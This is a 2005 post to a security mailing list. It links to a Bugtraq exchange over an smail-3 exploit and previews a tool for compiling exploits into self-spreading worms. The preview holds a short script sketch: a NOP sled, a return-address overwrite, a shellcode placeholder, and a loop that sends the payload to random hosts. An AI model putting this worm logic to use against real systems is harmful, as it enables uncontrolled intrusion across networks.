Dailydave mailing list archives
More stilton, but still pricey.
From: Dave Aitel <dave () immunitysec com>
Date: Sun, 25 Sep 2005 22:08:50 -0400
In case you missed it (as I did) here's Sean pulling an Apache Nosejob on the Greg, author of smail-3.
http://www.weird.com/~woods/projects/smail.html <--original project pagehttp://archives.neohapsis.com/archives/bugtraq/2005-03/0435.html (sean - you're owned!) http://archives.neohapsis.com/archives/bugtraq/2005-03/0459.html (greg - no I'm not) http://archives.neohapsis.com/archives/bugtraq/2005-03/0462.html (sean - yes you are: write4!) http://archives.neohapsis.com/archives/bugtraq/2005-03/0474.html (sean - here's a sploit!)
Greg takes it in good spirit though, which is good to see. http://www.cheesesupply.com/ is apparently the place to buy cheese.Does anyone else type in "Sans Dairy" into the googlebar instead of sans diary a lot? Maybe that's just me. But I'm never dissatisfied with the results!
In any case, here's a preview of the NIL (nematode intermediate language). You can generate this script simply by running ./nematode.py demosploit.py <--or any other exploit.
$ cat out.nem nops 5000 stroverwrite %27%83%04%08 1036 <--this is just a return address stroverwrite %CCtheshellcode 1044 <---this is actually a keyword for later startloop connect_random_host 5151 sendall closesock endloopThen you can test it with ./neminterpret.py, which is also the launch script once you compiled the NIL into shellcode with nemx86shellcodegenerator.py. See? Complete cycle. Now all exploits are worms - and worms that you can build on the fly AND control with a level of reliability and trust.
-dave
Current thread:
- More stilton, but still pricey. Dave Aitel (Sep 25)